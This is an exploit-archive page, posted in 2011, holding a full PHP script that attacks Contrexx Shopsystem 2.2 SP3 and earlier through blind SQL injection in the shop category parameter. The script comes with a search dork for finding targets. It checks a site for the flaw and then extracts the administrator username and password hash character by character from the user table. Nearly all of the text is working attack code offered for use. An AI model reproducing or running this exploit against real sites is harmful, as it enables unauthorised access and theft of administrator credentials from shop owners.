Home / exploits Contrexx Shopsystem 2.2 SP3 Blind SQL Injection
Posted on 18 August 2011
#!/usr/bin/php <?php /* Exploit title: Contrexx Shopsystem Blind SQL Injection Exploit Exploit written by: Penguin Exploit: index.php?section=shop&catId=[VALID categoryid] and [YOUR BLIND SQL CODE] Exploit tested on: Debian 6, Ubuntu Linux 11.04 Software price: abount 700 CHF Vendor: http://www.contrexx.com Found by: Penguin Version: =< 2.2 SP 3 Dork: inurl:index.php?section=shop&catId= Vendor: www.contrexx.com Visit: www.null-sector.info Greets to: Blacktiger/Luxy, ErrorX, hAgBaRd2ooo, KrimiX, zYiix, reutz/head */ echo "####################################### "; echo "# Contrexx Shopsystem Exploit # "; echo "# Exploit Type: Blind SQL Injection # "; echo "# Programmed by: Penguin # "; echo "# Visit www.null-sector.info # "; echo "####################################### "; if($argc < 4) { echo "Usage: ./exploit.php [TARGET_URL] [CATID] (Admin User Limit) "; echo "TARGET_URL = http://demo.de/index.php "; echo "CATID = CategoryId (MUST BE VALID!) "; echo "Admin User Limit = Limit x,0 @ Selecting! Standard: 0 "; die(); } // Config Variables $target_url = $argv[1] . "?section=shop&catId=" . $argv[2]; $charset_start_usr = 33; $charset_end_usr = 126; $charset_hash = Array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); $toLength = 100; //Functions function getUsername($toLength, $charset_start, $charset_end, $target_url,$limit) { $username = ""; // Get Length $length = -1; for($i=0;$i<$toLength;$i++) { $url = $target_url . "/**/and/**/(select/**/length(username)/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1)=" . $i; $src = file_get_contents($url); if(testIt($src) == true) { $length = $i; break; } } if ($length == -1) { die("There was a problem @ fetching username length :( "); } echo "Username length: $length ! "; $username = ""; echo "Username: "; for($k=0;$k<$length;$k++) { $charToAdd = ""; for($c=$charset_start;$c<$charset_end;$c++) { $p = $k+1; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/username/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($c)"); if(testIt($src) == true) { $charToAdd = $c; break; } } echo chr($c); $username .= chr($c); } echo " "; return $username; } function getHash($toLength, $charset, $target_url,$limit) { // Get Hash $hash = ""; echo "Hash: "; for($k=0;$k<32;$k++) { $charToAdd = ""; for($c=0;$c<count($charset);$c++) { $p = $k+1; $z = $charset[$c]; $src = file_get_contents($target_url . "/**/and/**/substring((select/**/password/**/from/**/contrexx_access_users/**/where/**/is_admin/**/=/**/1/**/limit/**/$limit,1),$p,1)=char($z)"); file_put_contents("test.html",$src); if(testIt($src) == true) { $charToAdd = $charset[$c]; break; } } echo chr($charToAdd); $hash .= chr($charToAdd); } echo " "; return $hash; } function testIt($src) { $check = explode("<div class="description">",$src); if(count($check) >= 2) { return true; } return false; } echo "Starting exploit.... Checking if Vulnerable..."; $check = file_get_contents($target_url . "'"); if(testIt($check) == true) { die("Target is not Vulnerable :( "); } $myLimit = $argv[3]; echo "Target is Vulnerable :) "; echo "Starting the SQL Injection... "; echo "Fetching Username... "; $username = getUsername($toLength, $charset_start_usr, $charset_end_usr, $target_url,$myLimit); $hash = getHash($toLength,$charset_hash,$target_url,$myLimit); echo "Exploited Successfully! "; echo "Full Logindata: $username : $hash "; echo "Have fun ;) "; ?>
